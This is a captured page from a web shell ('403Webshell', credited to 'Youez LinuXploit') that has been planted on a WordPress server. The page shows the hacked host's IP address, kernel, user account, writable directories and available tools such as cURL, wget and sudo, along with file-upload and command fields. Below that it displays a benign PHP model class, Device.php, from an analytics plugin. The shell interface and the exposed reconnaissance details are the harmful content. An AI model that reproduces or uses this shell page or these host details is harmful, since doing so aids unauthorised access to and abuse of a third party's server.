403Webshell
Server IP : 35.236.43.222  /  Your IP : 216.73.216.143
Web Server : Apache
System : Linux order-form-vm-001 5.10.0-37-cloud-amd64 #1 SMP Debian 5.10.247-1 (2025-12-11) x86_64
User : deploy ( 1002)
PHP Version : 8.1.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/ravel.network/public/wp-content/plugins/independent-analytics/IAWP/Models/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/ravel.network/public/wp-content/plugins/independent-analytics/IAWP/Models/Device.php
<?php

namespace IAWP\Models;

/** @internal */
class Device extends \IAWP\Models\Model
{
    use \IAWP\Models\Universal_Model_Columns;
    protected $row;
    private $type;
    private $os;
    private $browser;
    public function __construct($row)
    {
        $this->row = $row;
        $this->type = $row->device_type ?? null;
        $this->os = $row->os ?? null;
        $this->browser = $row->browser ?? null;
    }
    public function id() : int
    {
        return $this->row->device_type_id ?? $this->row->device_os_id ?? $this->row->device_browser_id;
    }
    public function table_type() : string
    {
        return 'devices';
    }
    public function device_type()
    {
        return $this->type;
    }
    public function browser()
    {
        return $this->browser;
    }
    public function os()
    {
        return $this->os;
    }
    public function examiner_title() : ?string
    {
        return $this->type ?? $this->os ?? $this->browser;
    }
    public function examiner_url() : string
    {
        return \IAWPSCOPED\iawp_dashboard_url(['tab' => 'devices', 'examiner' => $this->id()]);
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit